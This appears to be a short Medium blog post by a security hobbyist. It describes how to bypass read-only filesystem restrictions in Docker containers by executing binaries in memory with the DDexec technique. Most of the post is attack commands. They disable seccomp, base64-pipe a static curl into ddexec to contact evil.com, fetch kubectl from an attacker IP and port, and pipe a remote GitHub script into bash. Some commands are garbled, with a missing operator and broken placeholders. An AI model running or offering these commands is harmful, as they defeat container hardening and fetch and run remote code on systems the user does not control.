Bypassing read only filesystem(ro) restriction containers - inmemory execution

  1. These programs should be available in container image-
dd
bash | zsh | ash (busybox)
setarch | linux64 (busybox)
head
tail
cut
grep
od
readlink
wc
tr
base64
sleep
docker run --security-opt seccomp=unconfined --read-only -it ubuntu
wget https://github.com/moparisthebest/static-curl/releases/download/v7.82.0/curl-amd64 && mv curl-amd64 curlbase64 -w0 ./curl > curl.b64
$ ddexec()
> {
> # Copy and Paste the ddexec.sh script as it is.
> }
echo -n "<b64 encoded curl binary>" | ddexec /bin/curl evil.com
curl -sk "http://<>kubectl.b64>" | ddexec /bin/kubectl auth can-i --list
curl -sk "http://<IP>:<PORT>/<kubectl.b64>" | bash <(https://raw.githubusercontent.com/arget13/DDexec/main/ddexec.sh) /bin/kubectl auth can-i --list

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
n00🔑

n00🔑

Computer Security Enthusiast. Tries to understand how computers work. Would love to hear your suggestions and feedback. https://www.linkedin.com/in/pswalia2u/